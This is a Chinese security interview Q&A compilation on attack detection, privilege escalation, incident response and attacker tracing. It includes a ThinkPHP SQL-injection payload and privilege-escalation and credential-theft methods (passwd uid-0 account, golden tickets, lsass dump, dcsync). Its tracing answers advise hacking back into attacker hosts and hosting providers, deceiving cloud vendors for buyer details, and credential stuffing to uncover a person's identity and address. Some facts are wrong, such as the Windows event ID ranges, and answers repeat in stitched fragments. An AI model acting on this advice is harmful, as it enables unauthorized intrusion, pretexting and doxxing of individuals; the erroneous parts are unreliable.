2.请求体有llections.map.LazyMap、keyvalue.TiedMapEntry攻击链特征并且有明显的命令执行行为比如whoami
3.在返回500 堆栈报错页面内容中包含了系统返回内容 比如系统用户root如何研判Fastjson反序列化漏洞攻击成功
1.请求头method: POST content_type: application/json
2.请求体data:com.sun.rowset.JdbcRowSetImpl,dataSourceName,type
3.请求体: 包含攻击者C2服务器地址
4.状态码为400 也可能是500
5.通过态势感知平台进行回溯分析在分析中心输入语法(sip:(失陷服务器IP) OR sip:(攻击者C2IP)) AND (dip:(失陷服务器IP) OR dip:(攻击者C2IP))log4j特征如何判断他攻击成功没
以下是Log4j漏洞的一些特征 攻击者使用恶意请求中的特定参数名称和值来触发Log4j漏洞。这些参数包括JNDI名称和恶意JNDI URL。 攻击者通常会使用反向Shell或远程访问工具来执行任意命令或控制受感染的系统。 攻击者的攻击可能被记录在受感染应用程序的日志中。这些日志通常会显示异常或错误信息或者包含关于漏洞攻击的详细信息。 受感染的应用程序通常会发起大量的网络请求尝试将攻击者的命令或代码发送到攻击者的服务器。 要判断Log4j漏洞攻击是否成功可以采取以下措施 监视受感染应用程序的日志查看是否有异常或错误信息或者是否包含与攻击相关的信息。 监视网络流量查看是否有大量的请求被发送到攻击者的服务器。 检查系统中的异常或警告信息例如系统崩溃、不正常的CPU使用率或内存使用率等。 在受感染的系统中进行代码审查查看是否有与攻击相关的代码或配置文件。 如果发现应用程序受到了Log4j漏洞攻击应立即采取措施来解决漏洞并且必须对系统进行全面检查以确保没有其他漏洞或后门存在。同时建议采取安全措施例如升级Log4j版本、禁用JNDI功能、限制应用程序的输入等以防止类似漏洞的再次出现。
SQL注入攻击通常具有以下特征
基于输入参数的攻击SQL注入攻击是基于Web应用程序的输入参数进行的。攻击者通常通过修改输入参数中的某些值来注入恶意SQL语句。 错误提示信息SQL注入攻击可能会导致Web应用程序返回错误提示信息。攻击者可以根据这些错误提示信息获得Web应用程序的数据库结构和其他敏感信息。 时间延迟攻击者可能会在恶意SQL语句中添加时间延迟语句以便测试数据库的响应时间从而获取敏感信息。 数据库操作SQL注入攻击可以让攻击者执行未经授权的数据库操作例如删除、修改、添加数据等。 为了判断SQL注入攻击是否成功可以注意以下几点 检查Web应用程序的日志和错误提示信息是否包含异常的SQL语句和错误信息。 检查数据库的日志是否存在异常的数据库操作记录。 检查Web应用程序的用户数据和操作结果是否存在异常情况例如修改、删除、添加了未经授权的数据。 进行代码审计检查Web应用程序的代码是否存在漏洞例如没有对输入参数进行充分的过滤和验证。
原理口头语言用户的输入嵌入到SQL语句中然后被当做代码执行 成因未对用户输入的数据做验证或者处理预编译 可有看设备报警SQL注入的报警能看到攻击时间攻击ippayload如何判断是误报还是真是攻击如果是真实攻击怎么判断他攻击是否成功如果成功怎么处理 先看ip如果ip是公司内部的再看内部人员有没有相关操作如果不是公司人员业务的操作那就是攻击了 然后分析payload,分析它写的payload安全设备能否它进行过滤拦截如果它确实能绕过那就应该攻击成功了 成功的话赶紧上报做应急响应做出相应处理添加过滤规则修改数据库中能修改的数据比如管理员账号密码啥的
几万条告警怎么快速找到攻击成功的告警,哪些是误报
要把告警日志数据转换为情报数据进行输出分析 告警日志数据主要来自WAF、IPS「入侵防御系统」、IDS「入侵防御系统」、蜜罐、NTA、EDR、APT、防病毒、堡垒机、态势感知等安全设备。大多数企业按照自己的需求安装了安全设备提升了自身的感知攻击威胁的能力但是也正因为如此导致了单日的安全设备告警日志量会变得很多但是*这些数据不一定就是真实有效的攻击所触发的也有可能是因为安全设备检测特征规则感知到尝试攻击行为所造成的风险告警真实有效的攻击也有可能被淹没在里面为了能够降低分析成本就需要对这类因“攻击尝试行为“大量触发的风险告警进行数据清洗。通过特征规则将无效告警、误报告警过滤掉剩下的就是“待分析告警”; 网络之中的例子 —“哪些告警属于无效告警” 比如说攻击方通过对目标资产所处的C段进行批量扫描但C段的资产并非都是处于「活跃」状态甚至根本没有这个资产。而安全设备还是因为这个「攻击尝试行为」产生了告警那么这种告警就属于「无效告警」。—“怎么判断告警是误报” 比如说攻击方尝试利用现成的「EXPPOC集成脚本工具」对资产目标进行检测扫描安全设备检测到「攻击尝试行为」中的攻击特征就会产生告警。在通常情况下可以把告警中的URL的“网页状态码”、“页面回显数据”作为「误报告警」判断的条件之一。—“如何对「待分析告警」关联分析” 从「待分析告警」中提取攻击特征通过「攻击特征规则库」进行匹配看能否获取到「情报线索」。/index/index/index?optionsid)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 ** 比如说在「待分析告警」数据发现这一段Payload通过「攻击特征规则库」关联到它属于「ThinkPHP5 - 注入漏洞」。但我们通过「资产指纹信息库」进行核查发现「受攻击的资产」并没有使用「ThinkPHP5」框架。按照这个分析逻辑将整个流程脚本化输出。就可以排除「待分析告警」中那些真实的攻击尝试行为却又未攻击成功的告警。然后人工再对剩余的少量「待分析告警」进行分析研判从其中捕获到「真实有效」的攻击事件的可能性相对于以往的分析方式会大的多。如果捕获到「真实有效」的攻击事件还可以利用「资产指纹信息库」巡查具有同样指纹特征的设备是否也存在类似的漏洞。安全设备进行报警如何看是否是外界的攻击即是否是误报或是内部人员进行的操作查看报警日志对报警的数据进行分析看是不是内部人员的操作还是真实的攻击 流量分析是否是误报分析流量数据包可以用wireshark分析流量是不是正常的业务操作。
如果看到一个告警ip如何判断是否是真实攻击
首先我会先判断一下ip来源判断是内网ip还是公网ip若为内网ip然后对请求包的内容是否存在恶意payload然后再根据响应包内容有执行成功的回显若相应包中有对应的payload的回显则可以判断为攻击成功但是此时需要判断下是否为业务系统的逻辑造成的和是否是工作人员在测试业务系统漏洞若工作人员证实了该告警为自家安全ip则认为该攻击为误报若非自家ip且不存在逻辑因素则可判断为内网攻陷。若为公网ip若恶意payload利用成功则可判断为真实攻击。
如果看到一条sql注入告警怎么判断是否是攻击成功
对请求包的内容进行检查检查是否存在sql注入的利用语句同时检查响应包内容有执行成功的回显若相应包中存在sql注入攻击成功的回显则可判断攻击成功。
文件上传的攻击特征是什么
文件上传首先是POST的数据包且content-type为multipart/form-data如果为恶意的文件上传漏洞攻击则数据包中filename属性的后缀为jsp,php,asp等恶意后缀且文件内容一般为Webshell内容
怎么通过流量分析 判断出对方攻击成功了
可以通过返回包判断攻击是否成功比如命令执行攻击有回显的话返回包就会有命令执行的结果。如果有一些安全设备的话也可以通过查看告警信息判断。可以对请求包进行重放来判断在自己的机器上重放流量包将 payload 改成自己的 payload 来判断是否攻击成功
如果攻击的回显有延迟或者说攻击生效需要一定的时间你不能很快看见 那该怎么通过流量分析判断出攻击是否生效了
重放流量包将 payload 改成自己的来进行判断。
struts2命令执行的流量特征
一般Struts2框架的接口会以.do、.action结尾struts2一些常见的关键字memberAcecess,getRuntime,println,双引号单引号等号括号之类的符号。
四、内网相关面试题
Windows和Linux提权的方法
Windows内核漏洞、可修改的服务、服务路径缺陷、可修改的计划任务、psexec、bybassuacLinuxsuid、定时任务、内核漏洞、sudoer
Windows系统提权的思路
提权可分为纵向提权与横向提权纵向提权低权限角色获得高权限角色的权限横向提权获取同级别角色的权限。
方法 1.系统内核溢出漏洞提权 2.数据库提权 3.错误的系统配置提权 4.组策略首选项提权 5.WEB中间件漏洞提权 6.DLL劫持提权 7.滥用高危权限令牌提权 8.第三方软件/服务提权等Linux有哪些提权思路
常用的就内核提权、sudo滥用提权、suid提权、一些高权限运行的应用服务提权例如mysql、python、vi、定时任务提权、etc/passwd滥用提权
方法1.Linux内核漏洞提权2.低权限用户目录下可被Root权限用户调用的脚本提权SUID3.环境变量劫持高权限程序提权4.sudoer配置文件错误提权说一下Linux利用passwd提权
这个需要对passwd有写入权限正常root用户的uid为0如果自己写进去一个用户把它的uid改为0的话用这个用户登录系统就会切到root用户了
suid提权的原理
通过文件属主的身份运行文件
bypassuac的方法
白名单、COM 接口、Shell API也可以通过工具UACME
黄金白银票据
黄金票证是一种权限维持手段攻击者获得了对 AD 密钥分发服务帐户的控制权并使用该帐户伪造 TGT便能够访问 域上的任何资源。白银票据是伪造的 TGS 票证白银票仅允许攻击者伪造特定服务的 TGS 票据。
详细讲一下金票以及需要的信息
AS认证中返回的TGT是由krbtgt用户的密码Hash加密的有krbtgt的密码hash就可以自己制作任意的TGT 需要域名、域SID、要模拟的用户名、krbtgt的hash
读hash读取不到怎么办
用工具把lsass进程dump下来然后本地去读或者转储sam文件AD数据库的话可以用dcsync的方式转出来
dcsync的利用条件
需要配置两个ACL的权限就可以了详细讲一下ACL
ACL就是访问权限windows下不同的用户组有默认的ACL配置你也可以单独添加权限这样就算普通用户也可以给他添加向域管组添加用户的权限
psexec和wmic区别
psexec会有大量的日志wmic就不会
PTT有哪些攻击方法
MS14-068、金票、银票
内网扫描的方式
内网fscan扫描 或者 搭建内网socks5代理然后走代理进行扫描
Liunx系统中任何权限都能访问的临时文件位置
答/var/tmp
正向代理 反向代理的区别啊
正向代理和反向代理是两种不同的代理服务器架构。 正向代理Forward Proxy是代理服务器位于客户端与目标服务器之间的一种代理方式。客户端发送请求时先将请求发送到代理服务器然后代理服务器再将请求发送到目标服务器。在这个过程中客户端并不知道请求是由代理服务器发出的只知道代理服务器的地址。正向代理常用于客户端无法直接访问目标服务器的情况下比如防火墙的限制、访问限制等。 反向代理Reverse Proxy是代理服务器位于目标服务器与客户端之间的一种代理方式。客户端发送请求时请求先到达反向代理服务器然后由反向代理服务器将请求转发到目标服务器目标服务器将响应发送给反向代理服务器最后再由反向代理服务器将响应发送给客户端。在这个过程中客户端不知道请求是由目标服务器响应的只知道反向代理服务器的地址。反向代理常用于负载均衡、缓存、安全等方面。 在实际应用中常常使用反向代理作为Web服务器的入口来处理负载均衡、安全过滤、缓存等问题同时使用正向代理来提高用户体验隐藏客户端真实IP地址保护隐私等
五、应急响应面试题
1.内存马应急(重点)
内存马有几种类型
内存马是一种在受感染的主机内存中运行的恶意软件。一般来说内存马可以分为以下几种类型 注入型内存马通过利用漏洞将恶意代码注入到正常进程中从而在内存中运行。 自执行型内存马将恶意代码写入自启动项启动后自动运行。 进程注入型内存马利用进程注入技术在受感染进程的内存中运行恶意代码。 Hook型内存马利用Windows API的Hook机制修改进程中的关键函数从而运行恶意代码。 要判断内存马的类型可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说不同类型的内存马会留下不同的痕迹和特征比如某些进程的不正常行为、异常的网络连接等等。 针对不同类型的内存马处理方法也会有所不同。一般来说可以采取以下措施 注入型内存马修复漏洞、升级软件加强网络安全防护等方法来预防类似攻击对已经感染的主机可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。 自执行型内存马可以通过清理自启动项、卸载恶意程序等方式来清除内存马。 进程注入型内存马可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。 Hook型内存马可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。
内存马你怎么查杀**
内存马如何排查如果发现了一些内存webshell的痕迹需要有一个排查的思路来进行跟踪和分析也是根据各类型的原理 列出一个排查思路——1、如果是jsp注入日志中排查可以jsp的访问请求。 2、如果是代码执行漏洞排查中间件的error.log,查看是否有可疑的报错判断注入时间和方法。 3、根据业务使用的组件排查可能存在的java代码执行漏洞spring的controller了类型的话根据上报webshell的url查找日志filter或者listener类型可能会有较多的404但是带有参数的请求。 杀马 终止进程如果确认某个进程是内存马可以尝试终止该进程。在Windows系统中可以通过任务管理器或者命令行工具taskkill来终止进程在Linux系统中可以通过命令行工具kill或者pkill来终止进程。 删除文件如果进程终止后还需要删除相关的文件以防止内存马重新启动。在Windows系统中可以直接删除相关文件在Linux系统中需要先终止进程然后再删除文件。
怎么排查java内存马
直接利用内存马检测工具去找github也有很多检测脚本手工的话可以分析web日志filter或者listener类型的内存马会有大量路径相同参数不同的url请求或者页面不存在但是返回200的请求分析web.xml文件内存马的Filter是动态注册的web.xml是没有配置的也有可能是中间件漏洞通过代码执行加载内存马这就可以去排查中间件的错误日志像哥斯拉和冰蝎的内存马也会有跟webshell相似的特征分析特殊的classloader加载攻击者喜欢利用TemplatesImpl和bcel加载内存马因为内存马是驻留在内存里的本地无class文件通过检测Filter对应的ClassLoader目录下是否存在class文件来判断也可以把内存中所有的Filter的class dump出来使用工具分析是否存在恶意代码
2.溯源
溯源反制
通过 ip 定位物理位置对 ip 进行端口扫描进行反渗透通过社交 ID 进行追踪通过 ip 查域名、查邮箱、电话对域名进行溯源分析如果有恶意样本可通过分析恶意样本看是否存在攻击者信息通过蜜罐进行反制也可以进行反钓鱼
溯源有哪些思路
通过分析设备的告警、钓鱼邮件、木马病毒找到攻击者IP先去一些威胁情报平台搜索相关信息判断攻击者为代理服务器还是跳板机还是国内的云服务器查一查相关注册信息对攻击者进行反向渗透针对攻击者去搭建蜜罐如果是云服务器可以寻找到相关厂商联系客服说自己忘记密码了看看能不能获取到云服务器购买者信息对于获取到的信息可以通过各种社工库搜一搜各大搜索引擎去搜索看看能不能获取到更多信息也可以直接把服务器厂商打下来肯定就可以知道购买者的信息了如果把跳板机拿下就可以去查看桌面的敏感信息登录日志历史执行命令这样一步一步去获取更多的信息。
你会用什么办法溯源攻击方的个人信息呢
首先通过日志和蜜罐等方式获取到攻击方的 ip可以对 ip 进行反向渗透获取信息定位攻击者信息。也可以通过搜索引擎或者安全情报获取 ip 对应攻击者的网名id再通过社交平台获取攻击者的信息通过攻击 IP 历史解析记录/域名对域名注册信息进行溯源分析如果攻击者有种植木马等可以提取样本特征如用户名、ID、邮箱、C2 服务器等信息—同源分析搭载 jsonp 钓鱼的蜜罐通过 JSONP 跨域获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等
怎么做溯源国外ip怎么溯源国内ip怎么溯源
溯源思路首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式通过webshell或者木马去微步分析 或者去安恒威胁情报中心进行ip检测分析是不是云服务器基站等如果是云服务器的话可以直接反渗透看看开放端口域名whois等进行判断 获取姓名电话等丢社工库看看能不能找到更多信息然后收工 针对国外IP的溯源方法 使用网络安全工具进行溯源可以使用网络安全工具如traceroute、ping等命令对目标IP进行探测和跟踪。这些工具可以显示出攻击流量经过的路由器、网关和ISP等信息帮助我们了解攻击流量的来源地点。 查找域名信息通过WHOIS查询工具查询目标域名的注册信息包括注册人、注册机构、联系方式等信息可以从中了解到攻击来源的大致位置。 联系当地ISP如果攻击者使用的是公共网络如酒店、咖啡厅、机场等可以联系当地ISP寻求协助获取攻击来源的信息。
针对国内IP的溯源方法
使用网络安全工具进行溯源同样可以使用traceroute、ping等命令进行溯源显示攻击流量经过的路由器和ISP等信息帮助我们确定攻击来源的大致位置。 查找公网IP地址通过IP地址查询工具查询目标IP的公网IP地址可以从中了解到攻击来源的大致位置。 联系当地ISP如果攻击者使用的是公共网络如网吧、公共WiFi等可以联系当地ISP寻求协助获取攻击来源的信息。
有没有接触过溯源反制啊
溯源反制的原理主要是通过混淆和伪装攻击流量防止攻击者获取真实的攻击来源和行为信息。具体操作包括 使用代理服务器通过使用代理服务器可以改变攻击流量的来源IP地址使得攻击者无法追踪真实的攻击来源。 使用VPN技术VPN技术可以在公网上建立一个私有网络加密传输数据流量从而防止攻击者获取敏感信息。 使用匿名浏览器匿名浏览器可以隐藏用户真实的IP地址和浏览痕迹使得攻击者无法追踪用户的真实身份和行为。 使用虚假数据在攻击流量中混入虚假的数据如虚假的IP地址、协议和端口等信息可以混淆攻击者的追踪。
已知攻击者IP如何溯源定位攻击人员
1、IP反查注册信息可能会查询到域名通过域名查询备案和whois信息可能会查出邮箱电话通过社工库查询相关邮箱和电话信息定位人员支付宝微信转账微博百度贴吧等
2、通过白泽系统查询IP标记情况查看攻击者IP日常访问数据内容判断攻击者人员信息溯源会用些什么工具或者在线网站都可以说说常用的服务和对应的端口
查入侵IP入侵手法网路攻击事件的确定等 工具可以用wireshark进行溯源取证 WiresharkWireshark 是一款免费开源的网络协议分析工具可以捕获和分析网络数据包。通过使用 Wireshark您可以追踪网络数据流和操作记录了解数据的来源、目的和内容等信息。 Sysinternals SuiteSysinternals Suite 是一组 Windows 系统工具集合其中包括了很多用于溯源的工具。例如Process Monitor 可以监视 Windows 系统中的进程和操作记录用于追踪应用程序和系统资源的使用情况Regmon 可以监视系统注册表的操作记录用于追踪应用程序对系统注册表的读写操作。 SIFTSIFTSANS Investigative Forensic Toolkit是一款专业的数字取证工具集用于支持取证人员对数字媒体进行取证分析。SIFT 包含了很多工具例如Autopsy 可以分析磁盘映像文件Volatility 可以分析内存映像文件用于追踪系统的操作记录和数据流。 Sleuth KitSleuth Kit 是一款开源的数字取证工具集提供了一系列用于分析文件系统和磁盘映像文件的工具。例如fls 工具可以分析文件系统中的文件记录用于追踪文件的创建、修改和删除记录mactime 工具可以分析文件系统中的时间戳记录用于追踪文件的时间戳信息。 在线网站微步* 安恒威胁情报中心 全国互联网违法和不良信息举报中心 工业和信息化部网络安全管理局 溯源思路首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式通过webshell或者木马去微步分析 或者去安恒威胁情报中心进行ip检测分析是不是云服务器基站等如果是云服务器的话可以直接反渗透看看开放端口域名whois等进行判断 获取姓名电话等丢社工库看看能不能找到更多信息然后收工
应急响应要干什么啊
应急响应通常包括以下步骤 确认安全事件要及时发现安全事件快速确认其类型、范围和危害程度并进行预警和通报。 切断攻击链要采取有效措施尽可能快地切断攻击链阻止攻击扩散和进一步损失。 收集证据要收集、保留安全事件相关的证据和信息以便后续的调查和追踪。 分析病毒特征要对病毒、木马等安全事件的特征进行分析找出其入侵方式、攻击目的、传播途径等信息以便防止类似安全事件的再次发生。 应对措施根据安全事件的类型和程度采取相应的应对措施如修补漏洞、清除恶意软件、升级补丁、修改配置等。 恢复业务在限制损失和消除安全风险的基础上尽快恢复业务保障用户和业务的正常运转。 事件总结要对安全事件的应急响应过程进行总结和反思发现问题并进行改进提高应急响应能力。 常见的应急响应事件分类web入侵网页挂马、主页篡改、Webshell 系统入侵病毒木马、勒索软件、远控后门 网络攻击DDOS攻击、DNS劫持、ARP欺骗 网站被挂马如何应急具体流程都是差不多的看着变 1.取证登录服务器备份检查服务器敏感目录查毒搜索后门文件-注意文件的时间 用户后缀等属性调取日志系统中间件日志WAF日志等 2.处理恢复备份快照回滚最近一次确定入侵方法漏洞检测并进行修复 3.溯源查入侵IP入侵手法网路攻击事件的确定等 4.记录归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件
判断威胁情报是否有误就看wireshark进行流量分析判断是否为正常业务操作
应急响应流程
收集信息收集告警信息、客户反馈信息、设备主机信息等 判断类型判断攻击的类型是ddos还是被挂马了还是被控制了 控制范围隔离目标网络不让危害扩大 寻找原因还原攻击者的攻击链溯源攻击者的整个过程 修复防御直接封掉攻击者ip对于产生的原因进行对应防御 恢复业务将业务恢复正常 写报告总结整个过程反思不足之处优化应急方案
安全设备发现一台Linux主机触发挖矿告警上机排查该机器执行pstop命令未发现挖矿及恶意进程现在怀疑pstop命令被替换动态链接库被劫持请问应该如何处理**
1、使用cat /etc/ld.so.preload命令查看动态链接库文件是否加载有so文件提取加载的so文件上传至威胁情报平台判断是否为恶意so文件2、清除so文件使用ldconfig命令重新加载动态链接库执行pstop命令查看是否可以发现挖矿进程信息
3. 确认ps和top命令是否被替换可以使用命令which ps和which top查看这两个命令的路径是否为系统默认路径/bin/ps和/usr/bin/top如果不是则说明被替换。也可以通过比较ps和top命令的md5值来判断是否一致。2. 确认动态链接库是否被劫持可以使用命令ldd /bin/ps和ldd /usr/bin/top查看这两个命令依赖的动态链接库是否正常如果有动态链接库被替换则会发现其中一些动态链接库路径不对
4. 恢复被替换的命令和动态链接库如果确认被替换可以从系统安装介质或官方网站上下载对应版本的ps和top命令和动态链接库替换掉被替换的文件即可。
5. 检查系统安全替换命令和动态链接库只是暂时的措施需要进一步排查系统安全状况比如查杀恶意程序、加强访问控制、更新系统补丁等以防止类似问题再次发生
6. 借助工具busybox如何分析排查钓鱼邮件事件
1.确认邮箱批量发送时间点
2.排查邮箱登录日志发现【恶意IP】在【什么时间】通过web登录成功;
3.查看邮件内容确认钓鱼邮件的影响和目的
4.排查浏览器或上网行为判断是否访问过钓鱼页面
5.对访问过的设备进行全盘查杀分析邮件头部查看邮件的原始头部信息
检查发件人的真实地址、邮件服务器的来源、邮件传输路径等
注意查看Received字段查看是否存在异常的邮件转发或代理
分析链接与附件添加至黑名单
查看有多少内网ip访问过这个链接或者ip双向排查怎么排查 0day
先对失陷的机器进行隔离进行口令策略加固封禁入侵IP排查 0day 流量通过流量探针进行攻击流量排查同时分析下应用日志重点看下异常报错还有登录的地方还有url比较长一看就不正常的还有就是异常文件如果有异常文件可以先分析后处理然后回溯排查拿不准的话可以取得经理同意后复现进行加固及时向waf写规则
一台机子失陷了因业务需要不能断网怎么处理
关闭ssh、rdp等允许远程连接的协议端口看下外联有无可疑ip若有对其进行封禁或设置ip白名单只能有所需要的ip才能访问排查下有无文件遗留通过 webshellkiller、D 盾、河马之类的工具进行查杀查看下告警根据告警事件点审计各类日志和流量看看怎么打进来的进行加固
内网机子失陷怎么做
进行隔离、做好边界控制查看进程、若存在可疑进程通过pid找到文件路径保留现场经同意后干掉可疑进程和可疑文件通过可疑文件的创建时间定位到相应的应用日志位置看看是怎么进来的进行加固查看下定时任务有无可疑的看看有没有可疑账号存在确认下有没有文件遗留使用后门查杀工具进行排查
linux的日志存放在哪个目录下
Linux 的日志文件通常存储在 /var/log 目录下这是一个系统和应用程序日志文件的默认存储位置。不同的日志类型存储在不同的子目录下以下是一些常见的子目录和对应的日志类型 /var/log/messages系统日志包含了操作系统的各种信息、警告和错误等。 /var/log/auth.log安全认证日志记录系统的用户登录、认证、授权等信息。 /var/log/syslog系统日志的一个备份文件。 /var/log/kern.log内核日志记录内核级别的信息例如硬件故障等。 /var/log/dmesg内核环缓存包含启动信息、硬件检测和驱动程序的信息等。 /var/log/cron定时任务日志记录定时任务执行的情况。 /var/log/maillog邮件日志包含了邮件服务器的日志信息。
win登录日志怎么看判断是否登录成功
事件查看器里面有windows日志文件在下面安全性就可以看到很多日志登录成功的话就会有对应的事件id登录失败就会有不同的事件id
windows事件ID一般是多少
Windows事件ID是用来标识不同事件类型的数字代码。不同类型的事件有不同的事件ID通常情况下Windows系统的事件ID是在100到999之间的整数。例如系统启动时的事件ID为100关机时的事件ID为200应用程序错误的事件ID通常在1000以上。
需要注意的是不同版本的Windows操作系统可能会有不同的事件ID编号范围和对应的事件类型因此在查看和分析Windows日志时需要根据具体情况进行理解和处理。
Linux后门排查哪些东西
查看用户信息相关的文件看看有没有多余的账户、特权账户、隐藏账户、可以远程登录的账户、sudo权限的账户检查一下网络连接、异常进程检查定时任务、开机启动、服务、端口、可疑的文件检查系统日志
Linux怎么查看程序调用了哪些文件
lsof -c 指定的程序查看多个程序的话直接在后面加就可以
判断自己是否给getshell就是给用D盾查杀
webshell 查web日志分析攻击流量 扫webshell 排查网站目录查看最近更改的文件 shell 查看未知端口未知进程 排查恶意流量锁定感染进程 有安全设备就看安全设备
内网报警处理方式可能会问的会不一样不会直接问 首先就要是地位到具体的那一台机器既然报警那就说明知道了具体的漏洞类型加相应的补丁打上 以linux为主一般都会问linux的查看/var/log/secure系统日志查看登录失败的记录还有Linux历史命令–home目录的bash_histor查看执行过的命令。 在利用webshell或者是shell查杀工具查杀查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看是非有经过其他的机器。 拿到攻击ip之后到线上的一些网站查看主机类型比如360或者微步上查看是非是傀儡机vps跳板或者是国内个人云主机。 如果是个人云主机就可以通过whois查看是非有最近绑定的域名或者绑定者的邮箱。 知道邮箱之后就可以反查询出qq号说多少再利用社工查询到手机号 到一个知名的网站上查询这个手机号有没有注册过什么网站可以去这些网站通过撞库的方法登入这样就可以拿到这个攻击者的身份证学校地址这些了。 思路是应急响应;加固;溯源
被攻击后日志文件或者木马文件被删除排查lsof恢复被删除的文件然后查日志查服务查进程查看是否有新增的账号 安全设备进行报警如何看是否是外界的攻击即是否是误报或是内部人员进行的操作查看报警日志对报警的数据进行分析看是不是内部人员的操作还是真实的攻击 流量分析是否是误报分析流量数据包可以用wireshark分析流量是不是正常的业务操作
服务中了webshell 怎样从日志找webshell位置被拿shell后怎么应急怎样快速定位shell 从日志流量文件开始先定位位置查看敏感目录tmp usr/sbin etc/ssh 对新创建文件修改文件等进行查看找特殊权限文件比如777 。 流量的话从ua和playload去分析。比如菜刀连jsp木马第一个参数是a-q这个是不会变的第二个是编码第三个是playload。日志的话从找到的shell时间点去关联分析可以还原攻击手法 快速定位就是看进程和内存看占用时间长和占用率高的
挂马怎么排查啊xss webshell
确认是否被攻击可以通过检查网站页面源代码、访问日志、异常流量等方式确定网站是否被攻击。 分析攻击方式分析黑客攻击方式了解攻击者的手段比如是否是通过SQL注入、文件上传漏洞等方式进行攻击。 定位被攻击的文件查找被攻击的文件一般包括Web服务器的相关文件、网站源代码、数据库等可以通过检查文件的时间戳、比对文件的MD5值等方式进行确认。 清除恶意代码一旦确定被攻击的文件需要清除恶意代码可以手动清除或者使用工具进行清除。同时需要注意备份重要数据以免误操作导致数据丢失。 安全加固排查完恶意代码后需要对系统进行加固避免类似攻击再次发生可以使用一些安全工具或者参考安全加固手册进行操作。 验证清除结果最后需要对系统进行全面验证确保清除工作的完整性和有效性避免留下后门或者未发现的漏洞等问题。
webshell检测思路
通过匹配特征码特征值危险函数来查找webshell webshell如果传到服务器了在执行函数时这些对于系统调用、系统配置、数据库、文件的操作动作都是可以作为判断依据Linux下就是nobody用户起了bash,Windows下就是IIS User启动 cmd这些都是动态特征。再者如果黑客反向连接的话那很更容易检测了Agent 和IDS都可以抓现行Webshell总有一个 HTTP 请求如果我在网络层监控 HTTP并且检测到有人访问了一个从没访问过的文件而且返回了 200则很容易定位到webshell。使用webshell一般不会在系统日志中留下记录但是会在网站的 web日志中留下webshell页面的访问数据和数据提交记录
网页被挂马了可能有哪些原因
服务器已经被拿下了、通过漏洞修改了前端文件、存储型XSS、可能被上传了木马病毒
网站被挂马如何应急
1.取证登录服务器备份检查服务器敏感目录查毒搜索后门文件-注意文件的时间 用户后缀等属性调取日志系统中间件日志WAF日志等 2.处理恢复备份快照回滚最近一次确定入侵方法漏洞检测并进行修复 3.溯源查入侵IP入侵手法网路攻击事件的确定等 4.记录归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件
分析日志用什么工具啊
使用日志分析工具如LogForensicsGraylogNagiosELK Stack等等
webshell杀了以后还有外连流量怎么办应急
如果杀掉Webshell后仍然有外连流量可能存在以下情况 Webshell仍在运行在杀掉Webshell后有可能仍然有外连流量可能是因为Webshell并没有被完全杀死。可以再次检查系统进程确认Webshell是否被杀死。 恶意程序已经感染其他系统恶意程序可能已经感染了其他系统通过其中的一个系统继续进行攻击。可以在网络边界设备上进行流量监测检查是否有大量的外连流量确定是否有其他系统被感染。 攻击者已经在系统中植入了后门攻击者可能已经在系统中植入了后门程序通过后门程序继续进行攻击。可以在系统中查找可疑的后门程序或者系统服务同时在网络边界设备上进行流量监测检查是否有异常的网络流量。 紧急应对的方法可以包括以下步骤 切断网络连接如果发现外连流量很大可以考虑切断网络连接以防止恶意程序继续进行攻击。 查杀恶意程序可以使用杀毒软件或者安全工具对系统进行全面扫描查杀恶意程序并对系统进行修复。 清除后门和木马对于已经植入的后门和木马程序可以使用安全工具进行清除或者通过手动查找和删除的方式进行清除。 加强安全防护对于被攻击的系统需要加强安全防护包括更新补丁、强化口令、关闭不必要的服务等以防止再次受到攻击。 在利用webshell或者是shell查杀工具查杀查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看是非有经过其他的机器。 拿到攻击ip之后到线上的一些网站查看主机类型比如360或者微步上查看是非是傀儡机vps跳板或者是国内个人云主机。 服务中了webshell 怎样从日志找webshell位置被拿shell后怎么应急怎样快速定位shell 从日志流量文件开始先定位位置查看敏感目录tmp usr/sbin etc/ssh 对新创建文件修改文件等进行查看找特殊权限文件比如777 。 流量的话从ua和playload去分析。比如菜刀连jsp木马第一个参数是a-q这个是不会变的第二个是编码第三个是playload。日志的话从找到的shell时间点去关联分析可以还原攻击手法 快速定位就是看进程和内存看占用时间长和占用率高的
入侵排查的流程
1、检查系统账号安全查看服务器是否有弱口令远程管理端口 是否公开查看服务器是否有可疑账号cmd输入lusrmgr.msc命令查看服务器是否存在隐藏账号、克隆账号结合日志查看管理员登录时间用户名是否存在异常 2、检查异常端口、进程检查端口连接情况是否有远程连接、可疑连接a、netstat -ano查看目前的网络连接 定位可疑的ESTABLISHEDb、根据netstat 定位出的pid再通过tasklist命令进行进程定位 tasklist | findstr “PID” 3、检查启动项、计划任务、服务winr输入msconfig查看异常启动项winr输入regedit打开注册表查看开机启动项 4、检查系统相关信息winr输入systeminfo查看系统信息 5、日志分析winr输入eventvwr.msc,打开事件查看器导出应用程序日志安全日志系统日志利用log parser分析
如何判断是钓鱼邮件
以公司某部门的名义如安全部、综合部使用正式的语气内容涉及到账号和密码等敏感信息可能带有链接地址或附件制造紧张氛围比如24小时内今日下班前完整账号密码修改。看发件人 设备上也会报IP 上微步查一下IP是不是恶意IP 邮件的发件人和内容是不是正常的业务往来附件放到沙箱里 看看是否有问题有的邮件会提示你邮件由另一个邮箱代发或者邮箱地址不是本公司的再或者邮箱地址是qq或者163等个人邮箱的那就更没跑了
怎么防范邮件钓鱼
定期组织员工安全讲座提供员工的安全意识企业内邮件系统使用可信赖的邮件服务员工企业邮箱不得使用弱口令等如果被感染了也要让大家清楚该做什么例如直接拔网线等操作
针对dnslog的反制
